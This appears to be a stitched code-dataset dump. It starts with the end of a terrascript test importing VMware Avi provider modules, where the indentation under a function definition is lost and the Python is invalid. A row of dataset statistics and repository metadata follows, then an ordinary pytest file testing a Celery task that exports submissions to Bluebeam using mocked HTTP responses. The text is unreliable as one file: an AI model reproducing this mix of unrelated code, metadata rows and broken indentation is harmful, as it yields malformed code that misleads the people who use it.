from terrascript.resource.vmware.avi import avi_pingaccessagent
from terrascript.resource.vmware.avi import avi_pkiprofile
from terrascript.resource.vmware.avi import avi_pool
from terrascript.resource.vmware.avi import avi_poolgroup
from terrascript.resource.vmware.avi import avi_poolgroupdeploymentpolicy
from terrascript.resource.vmware.avi import avi_prioritylabels
from terrascript.resource.vmware.avi import avi_protocolparser
from terrascript.resource.vmware.avi import avi_rmcloudopsproto
from terrascript.resource.vmware.avi import avi_role
from terrascript.resource.vmware.avi import avi_scheduler
from terrascript.resource.vmware.avi import avi_securitymanagerdata
from terrascript.resource.vmware.avi import avi_securitypolicy
from terrascript.resource.vmware.avi import avi_seproperties
from terrascript.resource.vmware.avi import avi_server
from terrascript.resource.vmware.avi import avi_serverautoscalepolicy
from terrascript.resource.vmware.avi import avi_serviceengine
from terrascript.resource.vmware.avi import avi_serviceenginegroup
from terrascript.resource.vmware.avi import avi_siteversion
from terrascript.resource.vmware.avi import avi_snmptrapprofile
from terrascript.resource.vmware.avi import avi_sslkeyandcertificate
from terrascript.resource.vmware.avi import avi_sslprofile
from terrascript.resource.vmware.avi import avi_ssopolicy
from terrascript.resource.vmware.avi import avi_stringgroup
from terrascript.resource.vmware.avi import avi_systemconfiguration
from terrascript.resource.vmware.avi import avi_systemlimits
from terrascript.resource.vmware.avi import avi_tenant
from terrascript.resource.vmware.avi import avi_testsedatastorelevel1
from terrascript.resource.vmware.avi import avi_testsedatastorelevel2
from terrascript.resource.vmware.avi import avi_testsedatastorelevel3
from terrascript.resource.vmware.avi import avi_trafficcloneprofile
from terrascript.resource.vmware.avi import avi_upgradestatusinfo
from terrascript.resource.vmware.avi import avi_upgradestatussummary
from terrascript.resource.vmware.avi import avi_user
from terrascript.resource.vmware.avi import avi_useraccount
from terrascript.resource.vmware.avi import avi_useraccountprofile
from terrascript.resource.vmware.avi import avi_vcenterserver
from terrascript.resource.vmware.avi import avi_virtualservice
from terrascript.resource.vmware.avi import avi_vrfcontext
from terrascript.resource.vmware.avi import avi_vsdatascriptset
from terrascript.resource.vmware.avi import avi_vsvip
from terrascript.resource.vmware.avi import avi_wafapplicationsignatureprovider
from terrascript.resource.vmware.avi import avi_wafcrs
from terrascript.resource.vmware.avi import avi_wafpolicy
from terrascript.resource.vmware.avi import avi_wafpolicypsmgroup
from terrascript.resource.vmware.avi import avi_wafprofile
from terrascript.resource.vmware.avi import avi_webhook
def test_datasource_import():
from terrascript.data.vmware.avi import avi_actiongroupconfig
from terrascript.data.vmware.avi import avi_albservicesconfig
from terrascript.data.vmware.avi import avi_albservicesfileupload
from terrascript.data.vmware.avi import avi_alertconfig
from terrascript.data.vmware.avi import avi_alertemailconfig
from terrascript.data.vmware.avi import avi_alertscriptconfig
from terrascript.data.vmware.avi import avi_alertsyslogconfig
from terrascript.data.vmware.avi import avi_analyticsprofile
from terrascript.data.vmware.avi import avi_applicationpersistenceprofile
from terrascript.data.vmware.avi import avi_applicationprofile
from terrascript.data.vmware.avi import avi_authprofile
from terrascript.data.vmware.avi import avi_autoscalelaunchconfig
from terrascript.data.vmware.avi import avi_availabilityzone
from terrascript.data.vmware.avi import avi_backup
from terrascript.data.vmware.avi import avi_backupconfiguration
from terrascript.data.vmware.avi import avi_botconfigconsolidator
from terrascript.data.vmware.avi import avi_botdetectionpolicy
from terrascript.data.vmware.avi import avi_botipreputationtypemapping
from terrascript.data.vmware.avi import avi_botmapping
from terrascript.data.vmware.avi import avi_certificatemanagementprofile
from terrascript.data.vmware.avi import avi_cloud
from terrascript.data.vmware.avi import avi_cloudconnectoruser
from terrascript.data.vmware.avi import avi_cloudproperties
from terrascript.data.vmware.avi import avi_cluster
from terrascript.data.vmware.avi import avi_clusterclouddetails
from terrascript.data.vmware.avi import avi_controllerportalregistration
from terrascript.data.vmware.avi import avi_controllerproperties
from terrascript.data.vmware.avi import avi_controllersite
from terrascript.data.vmware.avi import avi_customipamdnsprofile
from terrascript.data.vmware.avi import avi_dnspolicy
from terrascript.data.vmware.avi import avi_dynamicdnsrecord
from terrascript.data.vmware.avi import avi_errorpagebody
from terrascript.data.vmware.avi import avi_errorpageprofile
from terrascript.data.vmware.avi import avi_federationcheckpoint
from terrascript.data.vmware.avi import avi_fileobject
from terrascript.data.vmware.avi import avi_fileservice
from terrascript.data.vmware.avi import avi_geodb
from terrascript.data.vmware.avi import avi_gslb
from terrascript.data.vmware.avi import avi_gslbgeodbprofile
from terrascript.data.vmware.avi import avi_gslbservice
from terrascript.data.vmware.avi import avi_hardwaresecuritymodulegroup
from terrascript.data.vmware.avi import avi_healthmonitor
from terrascript.data.vmware.avi import avi_httppolicyset
from terrascript.data.vmware.avi import avi_icapprofile
from terrascript.data.vmware.avi import avi_image
from terrascript.data.vmware.avi import avi_inventoryfaultconfig
from terrascript.data.vmware.avi import avi_ipaddrgroup
from terrascript.data.vmware.avi import avi_ipamdnsproviderprofile
from terrascript.data.vmware.avi import avi_ipreputationdb
from terrascript.data.vmware.avi import avi_jwtserverprofile
from terrascript.data.vmware.avi import avi_l4policyset
from terrascript.data.vmware.avi import avi_labelgroup
from terrascript.data.vmware.avi import avi_licenseledgerdetails
from terrascript.data.vmware.avi import avi_memorybalancerrequest
from terrascript.data.vmware.avi import avi_microservicegroup
from terrascript.data.vmware.avi import avi_natpolicy
from terrascript.data.vmware.avi import avi_network
from terrascript.data.vmware.avi import avi_networkprofile
from terrascript.data.vmware.avi import avi_networksecuritypolicy
from terrascript.data.vmware.avi import avi_networkservice
from terrascript.data.vmware.avi import avi_nsxtsegmentruntime
from terrascript.data.vmware.avi import avi_pingaccessagent
from terrascript.data.vmware.avi import avi_pkiprofile
from terrascript.data.vmware.avi import avi_pool
from terrascript.data.vmware.avi import avi_poolgroup
from terrascript.data.vmware.avi import avi_poolgroupdeploymentpolicy
from terrascript.data.vmware.avi import avi_prioritylabels
from terrascript.data.vmware.avi import avi_protocolparser
from terrascript.data.vmware.avi import avi_rmcloudopsproto
from terrascript.data.vmware.avi import avi_role
from terrascript.data.vmware.avi import avi_scheduler
from terrascript.data.vmware.avi import avi_securitymanagerdata
from terrascript.data.vmware.avi import avi_securitypolicy
from terrascript.data.vmware.avi import avi_seproperties
from terrascript.data.vmware.avi import avi_server
from terrascript.data.vmware.avi import avi_serverautoscalepolicy
from terrascript.data.vmware.avi import avi_serviceengine
from terrascript.data.vmware.avi import avi_serviceenginegroup
from terrascript.data.vmware.avi import avi_siteversion
from terrascript.data.vmware.avi import avi_snmptrapprofile
from terrascript.data.vmware.avi import avi_sslkeyandcertificate
from terrascript.data.vmware.avi import avi_sslprofile
from terrascript.data.vmware.avi import avi_ssopolicy
from terrascript.data.vmware.avi import avi_stringgroup
from terrascript.data.vmware.avi import avi_systemconfiguration
from terrascript.data.vmware.avi import avi_systemlimits
from terrascript.data.vmware.avi import avi_tenant
from terrascript.data.vmware.avi import avi_testsedatastorelevel1
from terrascript.data.vmware.avi import avi_testsedatastorelevel2
from terrascript.data.vmware.avi import avi_testsedatastorelevel3
from terrascript.data.vmware.avi import avi_trafficcloneprofile
from terrascript.data.vmware.avi import avi_upgradestatusinfo
from terrascript.data.vmware.avi import avi_upgradestatussummary
from terrascript.data.vmware.avi import avi_user
from terrascript.data.vmware.avi import avi_useraccountprofile
from terrascript.data.vmware.avi import avi_vcenterserver
from terrascript.data.vmware.avi import avi_virtualservice
from terrascript.data.vmware.avi import avi_vrfcontext
from terrascript.data.vmware.avi import avi_vsdatascriptset
from terrascript.data.vmware.avi import avi_vsvip
from terrascript.data.vmware.avi import avi_wafapplicationsignatureprovider
from terrascript.data.vmware.avi import avi_wafcrs
from terrascript.data.vmware.avi import avi_wafpolicy
from terrascript.data.vmware.avi import avi_wafpolicypsmgroup
from terrascript.data.vmware.avi import avi_wafprofile
from terrascript.data.vmware.avi import avi_webhook
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.vmware.avi
#
# t = terrascript.provider.vmware.avi.avi()
# s = str(t)
#
# assert 'https://github.com/vmware/terraform-provider-avi' in s
# assert '21.1.1' in s
| 32.909091 | 83 | 0.816197 | 1,795 | 14,842 | 6.623398 | 0.091365 | 0.164269 | 0.268736 | 0.322483 | 0.96686 | 0.959963 | 0.959963 | 0 | 0 | 0 | 0 | 0.001872 | 0.1361 | 14,842 | 450 | 84 | 32.982222 | 0.925363 | 0.031802 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002222 | 0 | 1 | 0.013825 | true | 0 | 1 | 0 | 1.013825 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
02a49256917eaada4c4a2acfa78a5e2a4dd17ae5 | 28,410 | py | Python | tests/test_tasks.py | SFDigitalServices/bluebeam-microservice | bb529f291b3399e29b71dd754e77c73f759c7762 | [
"MIT"
] | 1 | 2020-05-28T17:38:12.000Z | 2020-05-28T17:38:12.000Z | tests/test_tasks.py | SFDigitalServices/bluebeam-microservice | bb529f291b3399e29b71dd754e77c73f759c7762 | [
"MIT"
] | 3 | 2021-02-10T02:34:39.000Z | 2022-01-07T23:28:51.000Z | tests/test_tasks.py | SFDigitalServices/bluebeam-microservice | bb529f291b3399e29b71dd754e77c73f759c7762 | [
"MIT"
] | null | null | null | """ tests for tasks """
#pylint: disable=too-many-statements,line-too-long,too-many-lines
import os
import datetime
import copy
from unittest.mock import patch, Mock
import pytest
import tests.mocks as mocks
import tests.utils as test_utils
import service.resources.bluebeam as bluebeam
from service.resources.models import create_export, create_submission
from service.resources.db import create_session
from tasks import celery_app as queue, bluebeam_export
session = create_session() # pylint: disable=invalid-name
db = session() # pylint: disable=invalid-name
ZIP_FILE = 'tests/resources/Archive.zip'
TEST_PDF = 'tests/resources/dummy.pdf'
@pytest.fixture(scope='session')
def celery_config():
""" config for celery worker """
return {
'broker_url': os.environ['REDIS_URL'],
'task_serializer': 'pickle',
'accept_content': ['pickle', 'application/x-python-serialize', 'json', 'application/json']
}
def test_export_task_new_project_no_files(mock_env_access_key):
# pylint: disable=unused-argument
"""Test create a new project with no files"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(
db,
{i:mocks.SUBMISSION_POST_DATA[i] for i in mocks.SUBMISSION_POST_DATA if i != 'files'},
export_obj.guid
)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# add user
fake_post_responses.extend(test_utils.mock_add_users_response())
mock_post.side_effect = fake_post_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_bucketeer(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(db, mocks.BUCKETEER_SUBMISSION_POST_DATA, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = test_utils.mock_new_project_response()
mock_post.side_effect = fake_post_responses
with patch('tasks.requests.get') as mock_get:
with open(TEST_PDF, 'rb') as f: # pylint: disable=invalid-name
mock_get.return_value.content = f.read()
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_with_permit_number(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create a submission so there's something to export
submission_data_with_permit = mocks.SUBMISSION_POST_DATA.copy()
submission_data_with_permit['building_permit_number'] = '202001011234'
# create the export
export_obj = create_export(db)
create_submission(db, submission_data_with_permit, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = test_utils.mock_new_project_response()
mock_post.side_effect = fake_post_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_zip(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task where submission has a zip attachment"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(db, mocks.SUBMISSION_POST_DATA_ZIP, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.GET_FOLDERS_RESPONSE
# create folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
# initiate upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].return_value.status_code = 200
# confirm upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders 2
# this mock is modified to contain today's upload folder
fake_post_responses.append(Mock())
get_folders_updated = copy.deepcopy(mocks.GET_FOLDERS_RESPONSE)
get_folders_updated['ProjectFolders'].append(
{
'$id': '8',
'Id': '1234567',
'Name': bluebeam.SUBMITTAL_DIR_NAME + " " + str(datetime.date.today()),
'Path': '/path/somewhere'
}
)
fake_post_responses[len(fake_post_responses)-1].json.return_value = get_folders_updated
# initiate upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].return_value.status_code = 200
# confirm upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# add user and permissions
fake_post_responses.extend(test_utils.mock_add_users_response())
mock_post.side_effect = fake_post_responses
with patch('tasks.requests.get') as mock_get:
with open(ZIP_FILE, 'rb') as f: # pylint: disable=invalid-name
mock_get.return_value.content = f.read()
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_zip_upload_err(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export task where submission has a zip attachment
One of the uploads in zip fails.
"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(db, mocks.SUBMISSION_POST_DATA_ZIP, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.GET_FOLDERS_RESPONSE
# create folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
# initiate upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].return_value.status_code = 200
# confirm upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders 2
# this mock is modified to contain today's upload folder
fake_post_responses.append(Mock())
get_folders_updated = copy.deepcopy(mocks.GET_FOLDERS_RESPONSE)
get_folders_updated['ProjectFolders'].append(
{
'$id': '8',
'Id': '1234567',
'Name': bluebeam.SUBMITTAL_DIR_NAME + " " + str(datetime.date.today()),
'Path': '/path/somewhere'
}
)
fake_post_responses[len(fake_post_responses)-1].json.return_value = get_folders_updated
# initiate upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1] = Exception("Generic Error")
# confirm upload 2
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# delete project
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
mock_post.side_effect = fake_post_responses
with patch('tasks.requests.get') as mock_get:
with open(ZIP_FILE, 'rb') as f: # pylint: disable=invalid-name
mock_get.return_value.content = f.read()
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_delete_project_err(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export task where there is an error when trying to
clean up and recover from an error
"""
print("begin test_export_task_create_project_err")
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(db, mocks.SUBMISSION_POST_DATA_ZIP, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folder
fake_post_responses.append(Mock())
fake_post_responses[1].status_code = 500
fake_post_responses[1] = Exception("Error creating folder")
# delete project
fake_post_responses.append(Mock())
fake_post_responses[2].status_code = 500
fake_post_responses[2] = Exception("Error deleting non existing project")
mock_post.side_effect = fake_post_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_resubmission(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export resubmission task"""
print("begin test_export_task_resubmission")
# don't include previous submission
test_utils.finish_submissions_exports()
# create a resubmission so there's something to export
data = mocks.RESUBMISSION_POST_DATA.copy()
data['_id'] = "ABC123"
# create the export
export_obj = create_export(db)
create_submission(db, data, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_reqs:
fake_responses = []
# project exists
fake_responses.append(Mock())
fake_responses[0].status_code = 200
# get folders
fake_responses.append(Mock())
fake_responses[1].json.return_value = mocks.GET_FOLDERS_RESPONSE
# get folders
fake_responses.append(Mock())
fake_responses[2].json.return_value = mocks.GET_FOLDERS_RESPONSE
# create folders
fake_responses.append(Mock())
fake_responses[3].json.return_value = mocks.CREATE_FOLDER_RESPONSE
# initiate upload
fake_responses.append(Mock())
fake_responses[4].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload
fake_responses.append(Mock())
fake_responses[5].return_value.status_code = 200
# confirm upload
fake_responses.append(Mock())
fake_responses[6].status_code = 204
fake_responses.extend(test_utils.mock_add_users_response())
mock_reqs.side_effect = fake_responses
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_resubmission_no_upload_dir(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export resubmission task when cannot find upload dir
in preexisting bluebeam project
"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a resubmission so there's something to export
create_submission(db, mocks.RESUBMISSION_POST_DATA, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_reqs:
fake_responses = []
# project exists
fake_responses.append(Mock())
fake_responses[0].status_code = 200
# get folders
fake_responses.append(Mock())
fake_responses[1].json.return_value = mocks.GET_FOLDERS_RESPONSE_NO_UPLOAD
mock_reqs.side_effect = fake_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_resubmission_no_project(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export resubmission task but project isn't found in bluebeam"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a resubmission so there's something to export
create_submission(db, mocks.RESUBMISSION_POST_DATA, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_reqs:
fake_responses = []
# project exists
fake_responses.append(Mock())
fake_responses[0].status_code = 404
mock_reqs.side_effect = fake_responses
#patch the logger request
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_file_upload_error(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task when there is an error in uploading to bluebeam"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create a submission so there's something to export
data = mocks.SUBMISSION_POST_DATA.copy()
data['_id'] = "ABC123"
# create the export
export_obj = create_export(db)
create_submission(db, data, export_obj.guid)
# mock all responses for expected outbound requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# get folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.GET_FOLDERS_RESPONSE
# create folders
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
# initiate upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.INIT_FILE_UPLOAD_RESPONSE
# upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1] = Exception("Generic Error")
# confirm upload
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# delete project
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
mock_post.side_effect = fake_post_responses
with patch('tasks.requests.patch') as mock_patch:
mock_patch.status_code = 200
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_no_upload_folder(mock_env_access_key):
# pylint: disable=unused-argument
"""Test the export task when there is no dir set as the uploads dir"""
# don't include previous submission
test_utils.finish_submissions_exports()
# create the export
export_obj = create_export(db)
# create a submission so there's something to export
create_submission(db, mocks.SUBMISSION_POST_DATA, export_obj.guid)
# mock all responses for expected outbound requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# create project
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = mocks.CREATE_PROJECT_RESPONSE
fake_post_responses[0].status_code = 200
# create folders
for i in range(7):
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].json.return_value = mocks.CREATE_FOLDER_RESPONSE
if i == 1:
# mock folder permission
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
# delete project
fake_post_responses.append(Mock())
fake_post_responses[len(fake_post_responses)-1].status_code = 204
mock_post.side_effect = fake_post_responses
with patch('service.resources.bluebeam.DIRECTORY_STRUCTURE') as mock_dir_structure:
mock_dir_structure.return_value = [
{"name": "CCSF EPR"}
]
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_webhook(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export task new project with webhook
"""
print("begin test_export_task_new_project_webhook")
# don't include previous submission
test_utils.finish_submissions_exports()
# create a submission so there's something to export
data = mocks.SUBMISSION_POST_DATA_WEBHOOK.copy()
export_obj = create_export(db)
create_submission(db, data, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# refresh token
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = test_utils.BLUEBEAM_ACCESS_TOKEN
fake_post_responses[0].status_code = 200
# create project
fake_post_responses.extend(test_utils.mock_new_project_response())
mock_post.side_effect = fake_post_responses
#patch the trigger_webhook request
with patch('tasks.requests.post') as mock_patch:
mock_patch.status_code = 200
# set an expired token to force refresh
expired_token = test_utils.BLUEBEAM_ACCESS_TOKEN.copy()
hour_past = test_utils.HOUR_FUTURE - datetime.timedelta(hours=1)
expired_token['.expires'] = hour_past.strftime("%a, %d %b %Y %H:%M:%S %Z")
bluebeam.save_auth_token(db, expired_token)
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) > 0
assert len(export_obj.result['failure']) == 0
# clear out the queue
queue.control.purge()
def test_export_task_new_project_webhook_error(mock_env_access_key):
# pylint: disable=unused-argument
"""
Test the export task new project with webhook error
"""
print("begin test_export_task_new_project_webhook")
# don't include previous submission
test_utils.finish_submissions_exports()
# create a submission so there's something to export
data = mocks.SUBMISSION_POST_DATA_WEBHOOK.copy()
export_obj = create_export(db)
create_submission(db, data, export_obj.guid)
# mock all responses for expected requests
with patch('service.resources.bluebeam.requests.request') as mock_post:
fake_post_responses = []
# refresh token
fake_post_responses.append(Mock())
fake_post_responses[0].json.return_value = test_utils.BLUEBEAM_ACCESS_TOKEN
fake_post_responses[0].status_code = 200
# create project
fake_post_responses.extend(test_utils.mock_new_project_response())
mock_post.side_effect = fake_post_responses
#patch the trigger_webhook request
with patch('tasks.requests.post') as mock_patch:
mock_patch.side_effect = Exception("Error")
# set an expired token to force refresh
expired_token = test_utils.BLUEBEAM_ACCESS_TOKEN.copy()
hour_past = test_utils.HOUR_FUTURE - datetime.timedelta(hours=1)
expired_token['.expires'] = hour_past.strftime("%a, %d %b %Y %H:%M:%S %Z")
bluebeam.save_auth_token(db, expired_token)
bluebeam_export.s(
export_id=export_obj.guid
).apply()
db.refresh(export_obj)
assert export_obj.date_finished is not None
assert len(export_obj.result['success']) == 0
assert len(export_obj.result['failure']) > 0
# clear out the queue
queue.control.purge()
